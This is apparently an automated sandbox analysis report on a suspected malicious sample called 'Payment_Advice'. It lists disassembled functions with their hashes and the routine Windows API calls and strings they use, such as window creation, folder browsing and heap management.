Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction ID: 39fc750c717fa85374b543333b11634a01e26c95532fd7108031d2a87ad5157f
Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction Fuzzy Hash: BD12C5B7B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DE9198685

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF90 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a707402405e659f98bc40317dd1cd0cc62b6214a4faa6fed308a5dafce6d2b
Instruction ID: c95b1e6a5782af5cec516dbaf65588cb50c56e10c7e5d03dc92bc513e40b4349
Opcode Fuzzy Hash: 52a707402405e659f98bc40317dd1cd0cc62b6214a4faa6fed308a5dafce6d2b
Instruction Fuzzy Hash: 4E71B0726208524BE728CF29ECD06763353E7D9312B4BC738DB4187796C638E962D694

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF70 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e936c083af54460385bf2ea051fe1ceaecbd2b1360fccd680d527d7d1d40fc92
Instruction ID: 97b66486b5161bcd7a23183f3183f5b4ee4d75b2d3138dba207c11a2beef5c32
Opcode Fuzzy Hash: e936c083af54460385bf2ea051fe1ceaecbd2b1360fccd680d527d7d1d40fc92
Instruction Fuzzy Hash: CB7115716205426BD724CF2DECD0A763792FBC9711F4AC63CDA4287396C238E662D794

Uniqueness

Uniqueness Score: -1.00%

Function 00410290 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction ID: eb2bd8edf58a7b548409628f7e752ee024dd438a8f4a4b3381d4c93d83e85b70
Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction Fuzzy Hash: C2419732604B0947E728D929D8947EF7390EB84304F45493EDDA697381C6FDEDC68689

Uniqueness

Uniqueness Score: -1.00%

Function 00410313 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction ID: cd6e7a193df10d772fa9ba51171bcb4f79f2b4671c892ab6bac7019619f4a504
Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction Fuzzy Hash: DB317432604B0D4BE728D929D8953EF7390BB84308F49493FCD6697381C6F9E9C6C685

Uniqueness

Uniqueness Score: -1.00%

Function 00410359 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction ID: 02cf47e369336b64f92d67a87f121fe48856dec1df76c4deb2a1d2541843239f
Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction Fuzzy Hash: 7A218632744B0D4BE7288928D8953EF7390BB84304F49493FDD6697381CAF9E9C6C289

Uniqueness

Uniqueness Score: -1.00%

Function 00408BA9 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408A98: wcslen.MSVCRT ref: 00408AA4
Part of subcall function 00408A98: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00408ABA
Part of subcall function 00408A98: wcscpy.MSVCRT ref: 00408ACB

GetStockObject.GDI32(00000011), ref: 00408BF2
LoadIconW.USER32 ref: 00408C29
LoadCursorW.USER32(00000000,00007F00), ref: 00408C39
RegisterClassExW.USER32 ref: 00408C61
IsWindowEnabled.USER32(00000000), ref: 00408C88
EnableWindow.USER32(00000000), ref: 00408C99
GetSystemMetrics.USER32(00000001), ref: 00408CD1
GetSystemMetrics.USER32(00000000), ref: 00408CDE
CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 00408CFF
SetWindowLongW.USER32(00000000,000000EB,?), ref: 00408D13
CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00408D41
SendMessageW.USER32(00000000,00000030,00000001), ref: 00408D59
CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00408D97
SendMessageW.USER32(00000000,00000030,00000001), ref: 00408DA9
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408DB1
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00408DC6
wcslen.MSVCRT ref: 00408DC9
wcslen.MSVCRT ref: 00408DD1
SendMessageW.USER32(000000B1,00000000,00000000), ref: 00408DE3
CreateWindowExW.USER32(00000000,BUTTON,00412080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 00408E0D
SendMessageW.USER32(00000000,00000030,00000001), ref: 00408E1F
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408E56
SetForegroundWindow.USER32(00000000), ref: 00408E5F
BringWindowToTop.USER32(00000000), ref: 00408E66
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00408E79
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 00408E8A
TranslateMessage.USER32(?), ref: 00408E99
DispatchMessageW.USER32(?), ref: 00408EA4
DestroyAcceleratorTable.USER32(00000000), ref: 00408EB8
wcslen.MSVCRT ref: 00408EC9
wcscpy.MSVCRT ref: 00408EE1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EF4

Strings

D A, xrefs: 00408C43
0, xrefs: 00408C05
EDIT, xrefs: 00408D8D
BUTTON, xrefs: 00408E06
STATIC, xrefs: 00408D3B

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D A$EDIT$STATIC
API String ID: 2919324462-3594934238
Opcode ID: 123ca83ab0c83fd88dba949dc691977583e8e5ff77d2d6e508d843ab284833a1
Instruction ID: f698e8e1fcfc6ad4c48242fdd787ef2ab910b86b8eb80e2831087f92eed6a5d3
Opcode Fuzzy Hash: 123ca83ab0c83fd88dba949dc691977583e8e5ff77d2d6e508d843ab284833a1
Instruction Fuzzy Hash: DC918E71648300BFE7219B60ED49F9B7EA9FB48704F01453EF644A61E1CBB99940CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00408F95 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 116libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00408FB3

Part of subcall function 0040DFF0: TlsGetValue.KERNEL32(0000000E,?,?,004094F9,00000000), ref: 0040DFFA

memset.MSVCRT ref: 00408FC1
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 00408FCE
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00408FF0
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 00408FFC
wcsncpy.MSVCRT ref: 0040901D
wcslen.MSVCRT ref: 00409031
wcslen.MSVCRT ref: 004090C1
FreeLibrary.KERNEL32(00000000,00000000), ref: 004090E0

Strings

P, xrefs: 00409069
SHGetPathFromIDListW, xrefs: 00408FF2
SHBrowseForFolderW, xrefs: 00408FEA
SHELL32.DLL, xrefs: 00408FC9

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AddressLibraryProcwcslen$FreeInitializeLoadValuememsetwcsncpy
String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 1239124402-4219398408
Opcode ID: 3c6efe23a093742c34db4b48b740bbbc0e43620cdf862bd3b4c0e14241e1dd01
Instruction ID: c5a4ffbffc66ec8426f93ea89e9f6f8201288988f6e88a24a2cbc14571f4a0e7
Opcode Fuzzy Hash: 3c6efe23a093742c34db4b48b740bbbc0e43620cdf862bd3b4c0e14241e1dd01
Instruction Fuzzy Hash: DA416371514301AAC720AF759D49A9FBAE8EF84704F00483FF945E3292DB78D9448BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00411A02 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A12
RtlInitializeCriticalSection.NTDLL(00417660), ref: 00411A1E
TlsGetValue.KERNEL32(?,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A34
RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00411A4E
RtlEnterCriticalSection.NTDLL(00417660), ref: 00411A5F
RtlLeaveCriticalSection.NTDLL(00417660), ref: 00411A7B
GetCurrentProcess.KERNEL32(00000010,00100000,00000000,00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A94
GetCurrentThread.KERNEL32 ref: 00411A97
GetCurrentProcess.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411A9E
DuplicateHandle.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411AA1
RegisterWaitForSingleObject.KERNEL32(0000000C,00000010,00411AFA,00000000,000000FF,00000008), ref: 00411AB7
TlsSetValue.KERNEL32(00000000,?,0040CF88,0040CEC6,00000000,?,?,004094C5), ref: 00411AC4
RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00411AD5

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 2673290768-0
Opcode ID: ab633c144f53e305bafac38ae2cfbb9d27ffbee8e6733c7f67bceb8c74a85dc5
Instruction ID: 43bccb5f44728a0c183a358cb80f19a3296933c80aeccc21ff8ea1a4f9ffad6c
Opcode Fuzzy Hash: ab633c144f53e305bafac38ae2cfbb9d27ffbee8e6733c7f67bceb8c74a85dc5
Instruction Fuzzy Hash: A6210771646202AFDB109F64EC88F963FB9FB08391F16C07AF605962B5DB75D840CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A47A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(031E0000,00000000,00000000,?), ref: 0040DF07

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,00000000,?,?,?,00000009,0040391C,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A4A3
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A4B5
wcscpy.MSVCRT ref: 0040A4DB
wcscat.MSVCRT ref: 0040A4E6
wcslen.MSVCRT ref: 0040A4EC
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040391C,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0040420D,00000000), ref: 0040A501
wcscat.MSVCRT ref: 0040A519
wcslen.MSVCRT ref: 0040A51F

Strings

Downloads\, xrefs: 0040A513
Shell32.DLL, xrefs: 0040A49E
SHGetKnownFolderPath, xrefs: 0040A4AF

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Librarywcscatwcslen$AddressAllocateFreeHeapLoadProcValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1264281023-287042676
Opcode ID: 2ed63fd5278731c2a59bb78a547ea7f4314f45ed7590921f0cbfa87005ef0111
Instruction ID: eb5fdde348852424068ecc2b7fae0cfe8f77c0b49747bf43ed6907260fe0b972
Opcode Fuzzy Hash: 2ed63fd5278731c2a59bb78a547ea7f4314f45ed7590921f0cbfa87005ef0111
Instruction Fuzzy Hash: 6B213D31244301B6C61037799C5AF6F3A58EB91BD4F10403BF505B51C2D6BCC6659ABF

Uniqueness

Uniqueness Score: -1.00%

Function 00403400 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040348D
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403496
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004035B6
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000), ref: 004035BF

Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(031E0000,00000000,?,?), ref: 0040DB5C

PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004034C6

Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB

Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(031E0000,00000000,?), ref: 0040DB39

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004035F3
PathAddBackslashW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 004035FC

Strings

sysnative, xrefs: 004034AD, 004034B2

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: e3b826f6699c9025632e7203f33aefa29e5d8351d3247abac65243d099ba1b72
Instruction ID: d4425b2f06f1909e048ad8278635bd2b3a0af93032fa13b78a94668e4e3fc597
Opcode Fuzzy Hash: e3b826f6699c9025632e7203f33aefa29e5d8351d3247abac65243d099ba1b72
Instruction Fuzzy Hash: 33513275618301BAD600BBB1CC86F2F7AA9DFC4718F14C83EB045751D2CA7CD949AA6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D683 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040D691
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040D6A6
FreeLibrary.KERNEL32(00000000), ref: 0040D6C1
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040D6D0
Sleep.KERNEL32(00000000), ref: 0040D6E2
InterlockedExchange.KERNEL32(?,00000002), ref: 0040D6F5

Strings

Kernel32.dll, xrefs: 0040D68A
InitOnceExecuteOnce, xrefs: 0040D6A0

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 41b54250eae642625e703921e8a958d907d6cad9eca91794897e3b8843e46bfc
Instruction ID: abb353811933e5e0c01fdc05904e278036aeff3206fed199cedc2971c8720e75
Opcode Fuzzy Hash: 41b54250eae642625e703921e8a958d907d6cad9eca91794897e3b8843e46bfc
Instruction Fuzzy Hash: 7D01D431640204BBD7101FE4ED49FAF3B29EB42711F11483AF509A11C0DBBA8909CA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00409147 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 00409151
GetCurrentThreadId.KERNEL32 ref: 0040915F
IsWindowVisible.USER32(?), ref: 00409166

Part of subcall function 0040D7B2: RtlAllocateHeap.NTDLL(00000008,00000000,0040D02C), ref: 0040D7BE

GetCurrentThreadId.KERNEL32 ref: 00409183
GetWindowLongW.USER32(?,000000EC), ref: 00409190
GetForegroundWindow.USER32 ref: 0040919E
IsWindowEnabled.USER32(?), ref: 004091A9
EnableWindow.USER32(?,00000000), ref: 004091B9

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 684997728-0
Opcode ID: 1e5e3ab6f795d1081319b8141dacc3ba20eef2c070a75b8bad31eb9fa4f2ad39
Instruction ID: 31eda471f1cb499a369295ecb2023523c5ccaadffeb814b028fd5651457c72f2
Opcode Fuzzy Hash: 1e5e3ab6f795d1081319b8141dacc3ba20eef2c070a75b8bad31eb9fa4f2ad39
Instruction Fuzzy Hash: C001D4313043016EE7206B75AC8CAABBBE9AF45760B09803EF445E22E5D774CC01C629

Uniqueness

Uniqueness Score: -1.00%

Function 004091C8 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00409147,?), ref: 004091DB
GetCurrentThreadId.KERNEL32 ref: 004091F3
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,00408F50,00000000,00408B2A), ref: 0040920F
GetCurrentThreadId.KERNEL32 ref: 0040922F
EnableWindow.USER32(?,00000001), ref: 00409245
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040925C

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 459104275141b0c715442643ba30dab32395702e9f7f189deadac9fa7278c8c8
Instruction ID: d7320be81d177d1dafbd7ad4d3aa491d2180030fb93e63f46d4512a3211b406d
Opcode Fuzzy Hash: 459104275141b0c715442643ba30dab32395702e9f7f189deadac9fa7278c8c8
Instruction Fuzzy Hash: DA11CD31108741BBDB314F56EC48F53BFA9EB81B10F118ABEF065221E1C7749C04C618

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF93 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFB8
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040CFCC
TlsSetValue.KERNEL32(00000000,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFD9
TlsGetValue.KERNEL32(00000010,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040CFF0
RtlReAllocateHeap.NTDLL(00000008,00000000), ref: 0040CFFF
TlsSetValue.KERNEL32(00000000,?,?,?,?,004092B4,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D00E

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Value$AllocateHeap$Alloc
String ID:
API String ID: 2511646910-0
Opcode ID: f8d4ac58cec971f74a9cdcc41d0ae8b1470346a7d61edf378338f4034cbf9928
Instruction ID: e522f20ebd739161ea3b186ba5f08d5ad4d1c0e942c2e649f6f8b5b45fa9f158
Opcode Fuzzy Hash: f8d4ac58cec971f74a9cdcc41d0ae8b1470346a7d61edf378338f4034cbf9928
Instruction Fuzzy Hash: 0E115172644311BFD7109F65EC44EA6BBBAFB48750B05803AF904D73A0DB75D8048A98

Uniqueness

Uniqueness Score: -1.00%

Function 00411984 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 0041198E
CloseHandle.KERNEL32(?), ref: 00411997
RtlEnterCriticalSection.NTDLL(00417660), ref: 004119A3
RtlLeaveCriticalSection.NTDLL(00417660), ref: 004119C8
HeapFree.KERNEL32(00000000,?), ref: 004119E6
HeapFree.KERNEL32(?,?), ref: 004119F8

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: b15370ecc5d11d915fbc3e1ce94f3eb57d9f5ff0b77fa269a9f14ba5a6eba08a
Instruction ID: eb1efa575c7a1193ad789bfe2817c469877bfdc7e410445902cedd1c0dbf730b
Opcode Fuzzy Hash: b15370ecc5d11d915fbc3e1ce94f3eb57d9f5ff0b77fa269a9f14ba5a6eba08a
Instruction Fuzzy Hash: E60117B4202602AFC7148F15EC88EAABF79FF493117118139E62A86620C731E851CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040554D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040555C
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040556B
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040557B

Strings

RtlGetVersion, xrefs: 00405575
ntdll.dll, xrefs: 00405566

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 7c8b8c6c6b7fc7594bb483547fa99cc840af9721d0a9f5de1a7f0785217d556d
Instruction ID: 4c3a86b3ef4fb80ccf96d51786c1ad7f8faddb0dd8553e640a4690cba62d6515
Opcode Fuzzy Hash: 7c8b8c6c6b7fc7594bb483547fa99cc840af9721d0a9f5de1a7f0785217d556d
Instruction Fuzzy Hash: 2CE0D8317505113AD6205B316C05FEB3A9DCFC9704B110536B545F21C4D678C5018ABD

Uniqueness

Uniqueness Score: -1.00%

Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054A5
RtlEnterCriticalSection.NTDLL(00417680), ref: 004054B7
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054CE
CloseHandle.KERNEL32(00000008,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054DA

Part of subcall function 0040D772: HeapFree.KERNEL32(00000000,?,0040926D,004170C4,00000008,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040D7AB

RtlLeaveCriticalSection.NTDLL(00417680), ref: 0040551D

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: f9fc4f274073ef879c89f055458ad22c593e0fdcee0f3c8d66018c8da72653c2
Instruction ID: 79bf3139b6f1ab76d1202ff17a489f7276a24f81600fa3e90aae253bd74edf71
Opcode Fuzzy Hash: f9fc4f274073ef879c89f055458ad22c593e0fdcee0f3c8d66018c8da72653c2
Instruction Fuzzy Hash: CF11C232544711AFD7105F68EC44FD7BBB8EF45761722803AF804972A1DB75E8808BAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D586 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D59A
RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D5EF

Part of subcall function 0040D586: HeapFree.KERNEL32(00000000,?,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D5E8

RtlDeleteCriticalSection.NTDLL(00000020), ref: 0040D608
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3), ref: 0040D617

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 83fa752a7cac786abdb8633e5ae663743960f93593eff6c1d174bce996cff11c
Instruction ID: 3d4c950c7840245ecf787318483d856215c0b9662098a14833ae3b93709eff97
Opcode Fuzzy Hash: 83fa752a7cac786abdb8633e5ae663743960f93593eff6c1d174bce996cff11c
Instruction Fuzzy Hash: CE110435501602AFC7249F55EC48F97BBB9EB48305F12843AA816A26A1CB35E845CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004092D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(031E0000,00000000,00000000,?), ref: 0040DF07

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401991,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004092F4
wcscmp.MSVCRT ref: 00409302
memmove.MSVCRT ref: 0040931A

Strings

\\?\, xrefs: 004092FA, 00409314

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AllocateFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 2309408642-4282027825
Opcode ID: fd930755749ed3d2be605ff4be820197e70570634f0ba2bf411523a77f39549e
Instruction ID: d1022656d2e26dd14f3e25edef1fec080478658712660f720d71a31c09dbf965
Opcode Fuzzy Hash: fd930755749ed3d2be605ff4be820197e70570634f0ba2bf411523a77f39549e
